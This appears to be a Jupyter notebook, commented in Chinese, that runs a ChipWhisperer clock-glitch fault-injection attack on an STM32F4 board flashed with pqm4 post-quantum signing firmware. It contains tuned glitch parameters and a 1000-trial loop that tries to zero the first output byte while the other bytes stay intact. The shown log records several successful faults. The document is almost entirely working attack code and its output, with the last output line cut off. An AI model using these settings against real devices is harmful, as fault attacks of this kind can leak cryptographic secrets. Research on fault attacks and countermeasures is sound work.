In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F4'
CRYPTO_TARGET = 'TINYAES128C'
SS_VER='SS_VER_2_1'

In [2]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

INFO: Found ChipWhisperer😍


In [3]:
#定義執行sh命令的函數
from IPython import get_ipython

def run_bash_command(command):
    shell = get_ipython()
    result = shell.run_cell_magic('sh','', command)
# run_bash_command('cd ..;ls')


# run_bash_command('make PLATFORM="CW308_STM32F4" CRYPTO_TARGET="TINYAES128C" SS_VER="SS_VER_2_1"')

In [ ]:
def upload1():
    fw_path = "../../../hardware/victims/firmware/pqm4_L2_extract/PQCgenKAT_sign-{}.hex".format(PLATFORM)
    cw.program_target(scope, prog, fw_path)
    if SS_VER == 'SS_VER_2_1':
        target.reset_comms()
    else:
        cw.program_target(scope, prog, fw_path)
    return True

if upload1():
    print("上傳成功！！！")

Detected known STMF32: STM32F40xxx/41xxx
Extended erase (0x44), this can take ten seconds or more
Attempting to program 30167 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 30167 bytes
上傳成功！！！


In [5]:
# 定义刷新函数
if SS_VER == 'SS_VER_2_1':
    if PLATFORM == "CWLITEXMEGA":
        def reboot_flush():            
            scope.io.pdic = False
            time.sleep(0.1)
            scope.io.pdic = "high_z"
            time.sleep(0.1)
            #Flush garbage too
            target.flush()
        print("xmega")
    else:
        def reboot_flush():            
            scope.io.nrst = False
            time.sleep(0.05)
            scope.io.nrst = "high_z"
            time.sleep(0.05)
            #Flush garbage too
            target.flush()
else:
    def reboot_flush():
        time.sleep(0.2)
        target.flush()

In [6]:
#收集没有故障情况下返回数据
no_fault_list = []

In [7]:
#在没有故障的情况下观察返回值
reboot_flush()
p = bytearray(136*[1])
target.simpleserial_write('A', p)
time.sleep(1)
    
output = target.simpleserial_read_witherrors('r',136)
    # p_list = []
    # for i in range(180):
    #     p_list.append(output['payload'][i])
    # print(p_list[0])
    # print(p_list[64])
    # print(p_list[128])
    # r_list = get_rhoprime(p_list)
    # print(r_list)
print(output['payload'])

for i in range(136):
    no_fault_list.append(output['payload'][i])

CWbytearray(b'dd c4 36 24 9f 46 16 88 a7 ca 84 40 4b ba 1b eb 55 7a 22 61 33 76 06 15 56 42 c6 4a c1 c4 76 0f 93 05 1e e1 92 8c 49 00 9c 0f 64 d0 68 25 e1 fb aa 6f af 1b 7d 88 54 16 62 8b 88 5d 3d aa 76 97 c6 d3 db bf 46 0e 47 a5 24 6f 17 69 64 fb 69 7f a5 2a a9 a7 ee 46 66 2e 28 45 45 4c db 5b f3 0e 01 aa e6 d8 08 9d 3c d4 12 21 25 99 8e e9 9f 59 c2 52 7d fb c6 c4 cd 92 61 af 66 98 eb a1 77 be 78 82 9b ea b6 bb b3 23')


In [8]:
#判断剩余元素是否相同
def panduan_other(i,list1,list2):
    for num in range(136):
        if num == i:
            continue
        if list1[num] != list2[num]:
            return False
    return True

In [9]:
#设置故障注入参数
if scope._is_husky:
    scope.glitch.enabled = True
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.glitch.repeat = 1
scope.io.hs2 = "glitch"
scope.glitch.width =  -3.125
scope.glitch.ext_offset = 16048
scope.glitch.offset = -48.828125 
#-14
print(scope.glitch)
glitch_loc = range(16048,16049)

(ChipWhisperer Glitch WARNING|File ChipWhispererGlitch.py:942) Negative offsets <-45 may result in double glitches!


clk_src     = clkgen
width       = -3.125
width_fine  = 0
offset      = -48.828125
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 16048
repeat      = 1
output      = clock_xor



In [10]:
success_num = 0
from tqdm.notebook import tqdm, trange
import logging
for i in trange(0,1000):# 
            print("attack{}:".format(i),end = ' ')
            reboot_flush()
            scope.adc.timeout = 0.2
            scope.glitch.ext_offset = 16048
            p = bytearray(136*[1])
            scope.arm()
            target.simpleserial_write('A', p)
            time.sleep(0.5)
            ret = scope.capture()
            if ret:
                reboot_flush() #bad if we accidentally didn't have this work
                time.sleep(0.1)
                print("timed out!")
                continue
            output = target.simpleserial_read_witherrors('r', 136, glitch_timeout = 3)
            if output['valid']:
                if output['payload'][0] == 0:  #当第1个数据被攻击为0
                    # print(output['payload'])
                    if panduan_other(0,no_fault_list,output['payload']): #其余数据不变的情况输出
                        print('successful!')
                        print(output['payload'])
                        success_num +=1
                    else:
                        print('failure')
                else:
                    print('failure')
                reboot_flush()
            else:
                print("valid and failure:")
                reboot_flush()
success_rate = success_num / 1000
print("success rate is ",success_rate)

  0%|          | 0/1000 [00:00<?, ?it/s]

attack0: failure
attack1: failure
attack2: successful!
CWbytearray(b'00 c4 36 24 9f 46 16 88 a7 ca 84 40 4b ba 1b eb 55 7a 22 61 33 76 06 15 56 42 c6 4a c1 c4 76 0f 93 05 1e e1 92 8c 49 00 9c 0f 64 d0 68 25 e1 fb aa 6f af 1b 7d 88 54 16 62 8b 88 5d 3d aa 76 97 c6 d3 db bf 46 0e 47 a5 24 6f 17 69 64 fb 69 7f a5 2a a9 a7 ee 46 66 2e 28 45 45 4c db 5b f3 0e 01 aa e6 d8 08 9d 3c d4 12 21 25 99 8e e9 9f 59 c2 52 7d fb c6 c4 cd 92 61 af 66 98 eb a1 77 be 78 82 9b ea b6 bb b3 23')
attack3: failure
attack4: failure
attack5: failure
attack6: failure
attack7: failure
attack8: successful!
CWbytearray(b'00 c4 36 24 9f 46 16 88 a7 ca 84 40 4b ba 1b eb 55 7a 22 61 33 76 06 15 56 42 c6 4a c1 c4 76 0f 93 05 1e e1 92 8c 49 00 9c 0f 64 d0 68 25 e1 fb aa 6f af 1b 7d 88 54 16 62 8b 88 5d 3d aa 76 97 c6 d3 db bf 46 0e 47 a5 24 6f 17 69 64 fb 69 7f a5 2a a9 a7 ee 46 66 2e 28 45 45 4c db 5b f3 0e 01 aa e6 d8 08 9d 3c d4 12 21 25 99 8e e9 9f 59 c2 52 7d fb c6 c4 cd 92 61 af 66 98 eb a1 77 be 78 82 9b ea b6 bb

In [11]:
scope.dis()
target.dis()